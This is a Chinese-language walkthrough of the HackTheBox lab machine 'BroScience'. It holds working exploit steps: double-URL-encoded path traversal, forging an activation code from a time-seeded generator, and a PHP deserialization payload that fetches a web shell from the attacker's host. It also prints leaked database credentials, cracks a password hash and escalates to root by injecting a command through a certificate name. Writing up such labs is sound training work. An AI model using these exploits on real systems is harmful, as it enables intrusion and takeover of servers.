常规端口扫描

开放三个端口

web渗透

打开80端口是一个带有登录功能的健身网页

目录扫描一波，发现了几个目录列表，有源码泄露漏洞

点击img.php,有个错误提示，说缺少path参数

拼接好参数尝试能否读取到系统文件，直接写../../../../../etc/passwd会被拦截，有参数过滤，但是通过两次url编码可以绕过

把读取到的passwd下载到本地，发现这台机器有三个用户，分别是root,bill和postgres

利用curl把includes目录的php文件全下载到本地，便于之后的分析需要

回到之前的网页，本来想着是自己注册一个账号登录，看看后台是否含有利用的点，但是注册完毕后还要点击验证链接，由于是靶场环境，只能自己尝试绕过
把注册页面的register.php下载下来分析一波源码

发现在注册用户的时候调用了utils.php并且发送激活链接调用了activate.php

再把activate.php下载下来分析，发现这个页面只能告诉我们验证码是个32位的字母和数字组合

在activate.php没得到更多有用的信息，但是之前分析register.php的时候发现还调用了utils.php，于是把之前下载的utils.php来拿出来分析一波，在阅读utils.php的时候，这个php文件的第一段代码就直接告诉我们了生成验证码的方法，利用注册时的系统时间来初始化随机数的种子值，从而生成一个32位字符的验证码，这里还有一个可以利用的点，后面会说到

那我们就可以直接用他这个源码生成一个验证码

php中time函数生成的值如下格式，可以找到注册时间再利用https://www.epochconverter.com/这个网站来生成

新建一个yzm.php文件,内容如下，之后利用php -f yzm.php来生成激活码

<?php
function generate_activation_code() {
    $chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890";
    srand(1676033457);  // 这里的值由上面网站生成
    $activation_code = "";
    for ($i = 0; $i < 32; $i++) {
        $activation_code = $activation_code . $chars[rand(0, strlen($chars) - 1)];
    }
    return $activation_code;
}
echo generate_activation_code() ;
?>

打开f12，把请求内容复制下来，利用curl来显示出cookie以及请求时间

1	curl -X POST -d 'username=asd&email=asd%40htb.com&password=asd&password-confirm=asd' https://broscience.htb/register.php -k -i

在利用curl拼接上cookie和上面生成的激活码来激活账号（这里图片跟上面不一致，是因为这个靶场会定期删除账号及上传内容）
1
curl -k -X POST -b 'PHPSESSID=q2aivm3nb6aid52je1c3c7kull' https://broscience.htb/activate.php?code=mokEoV8EyMTtc2ouUJfio6eXjyQPbNdL -i

利用激活的账号，登录到网站中，有个用户界面，在之前分析utils.php中发现这个php文件还负责生成用户cookie中的user-prefs，并且还具有一个可利用的反序列化漏洞。

在utils.php中avatar 类有两个参数，一个参数imgpath用于指向图像的路径，另一个tmp参数作用是保存img传来的内容。

在AvatarInterface中有一个__wakeup()魔法函数，用于创建 avatar 类的新实例和avatar类的类保存方法。

所以我们可以将 imgpath路径直接设置为我们反连shell的地址，tmp路径会将其保存在当前目录下，之后可以访问shell.php并且获得一个shell。

反序列化php内容如下，这里的shell.php，我用的是kali自带的，用其他的也一样道理

<?php
class Avatar {
    public $imgPath;

    public function __construct($imgPath) {
        $this->imgPath = $imgPath;
    }

    public function save($tmp) {
        $f = fopen($this->imgPath, "w");
        fwrite($f, file_get_contents($tmp));
        fclose($f);
    }
}

class AvatarInterface {
    public $tmp="http://10.10.14.25:80/shell.php";
    public $imgPath="./shell.php"; 

    public function __wakeup() {
        $a = new Avatar($this->imgPath);
        $a->save($this->tmp);
    }
}
$payload = base64_encode(serialize(new AvatarInterface));
echo $payload;
?>

利用php -f payload.php运行输出，得到含有恶意代码的cookie，再把此cookie利用cookie editor插件写入页面同时利用python临时生成一个web服务器，之后刷新网页

访问https://broscience.htb/shell.php成功得到一个shell，找到一个立足点

但是这个shell的权限太低，需要提权才能读取到flag

提权至用户

在之前的过程中发现这台机器有个postgres用户，并且在泄露的源码中发现了db_connect.php（如下）直接暴露了数据库连接的账号密码等信息，于是想到连接postgresql看看能不能找到一些有用的账号密码

<?php
$db_host = "localhost";
$db_port = "5432";
$db_name = "broscience";
$db_user = "dbuser";
$db_pass = "RangeOfMotion%777";
$db_salt = "NaCl";

$db_conn = pg_connect("host={$db_host} port={$db_port} dbname={$db_name} user={$db_user} password={$db_pass}");

if (!$db_conn) {
    die("<b>Error</b>: Unable to connect to database");
}

这里我发现他在反弹回来的shell用psql连接时会一直卡住，但是用python生成一个交互式shell之后就没啥问题了

1	python3 -c "import pty;pty.spawn('/bin/bash')"

1	psql -h localhost -p 5432 -U dbuser -d broscience

进入shell之后利用\dt查看一下有哪些表，这里注意到有个users表，一般情况下账号密码应该保存在这个表下，利用\copy (SELECT * FROM users) TO ‘/tmp/users.csv‘命令把users表转存在本地便于分析

查看users.csv,发现了几个用户名和密码，但是密码是加密的，由于这个机器涉及到的用户只有bill，那就利用hashcat直接针对bill的密码hash值进行破解，得到bill:iluvhorsesandgym

1	hashcat -m 20 bill.txt /usr/share/wordlists/rockyou.txt

利用得到的账号密码进行ssh登录，成功获取user.txt的flag

提权至ROOT

拿到userflag之后又是一些常规的提权信息收集，在跑pspy脚本时发现有个计划任务再以root身份运行
切到/opt目录查看一下renew_cert.sh是做什么的，内容如下：

#!/bin/bash

if [ "$#" -ne 1 ] || [ $1 == "-h" ] || [ $1 == "--help" ] || [ $1 == "help" ]; then
    echo "Usage: $0 certificate.crt";
    exit 0;
fi

if [ -f $1 ]; then

    openssl x509 -in $1 -noout -checkend 86400 > /dev/null

    if [ $? -eq 0 ]; then
        echo "No need to renew yet.";
        exit 1;
    fi

    subject=$(openssl x509 -in $1 -noout -subject | cut -d "=" -f2-)

    country=$(echo $subject | grep -Eo 'C = .{2}')
    state=$(echo $subject | grep -Eo 'ST = .*,')
    locality=$(echo $subject | grep -Eo 'L = .*,')
    organization=$(echo $subject | grep -Eo 'O = .*,')
    organizationUnit=$(echo $subject | grep -Eo 'OU = .*,')
    commonName=$(echo $subject | grep -Eo 'CN = .*,?')
    emailAddress=$(openssl x509 -in $1 -noout -email)

    country=${country:4}
    state=$(echo ${state:5} | awk -F, '{print $1}')
    locality=$(echo ${locality:3} | awk -F, '{print $1}')
    organization=$(echo ${organization:4} | awk -F, '{print $1}')
    organizationUnit=$(echo ${organizationUnit:5} | awk -F, '{print $1}')
    commonName=$(echo ${commonName:5} | awk -F, '{print $1}')

    echo $subject;
    echo "";
    echo "Country     => $country";
    echo "State       => $state";
    echo "Locality    => $locality";
    echo "Org Name    => $organization";
    echo "Org Unit    => $organizationUnit";
    echo "Common Name => $commonName";
    echo "Email       => $emailAddress";

    echo -e "\nGenerating certificate...";
    openssl req -x509 -sha256 -nodes -newkey rsa:4096 -keyout /tmp/temp.key -out /tmp/temp.crt -days 365 <<<"$country
    $state
    $locality
    $organization
    $organizationUnit
    $commonName
    $emailAddress
    " 2>/dev/null

    /bin/bash -c "mv /tmp/temp.crt /home/bill/Certs/$commonName.crt"
else
    echo "File doesn't exist"
    exit 1;

通过分析发现renew_cert.sh脚本主要是用来检查SSL证书是否过期的，但是他的倒数第四行却有个可控变量$commonName，我们可以利用openssl生成一个新证书，在填写Common Name这一栏时加入恶意代码，让它以root权限运行，从而获得root权限
1
openssl req -x509 -sha256 -nodes -newkey rsa:4096 -days 1 -keyout broscience.key -out broscience.crt
之后就等待脚本运行，利用/bin/bash -p成功获取到root.txt的flag